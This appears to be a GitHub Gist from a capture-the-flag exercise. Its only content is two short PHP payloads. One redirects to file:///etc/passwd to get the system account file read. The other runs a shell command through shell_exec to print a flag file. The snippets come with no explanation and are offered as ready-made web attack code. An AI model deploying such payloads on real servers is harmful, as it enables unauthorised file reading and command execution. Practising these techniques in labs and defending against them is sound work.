Skip to content

Instantly share code, notes, and snippets.

View havertz2110's full-sized avatar

Tâm Anh havertz2110

View GitHub Profile
<!DOCTYPE html>
<html>
<body>
<h1>System Command Output:</h1>
<?php
header('location:file:///etc/passwd');
?>
</body>
</html>
<?php
echo shell_exec("cat /flag_9d16a");
?>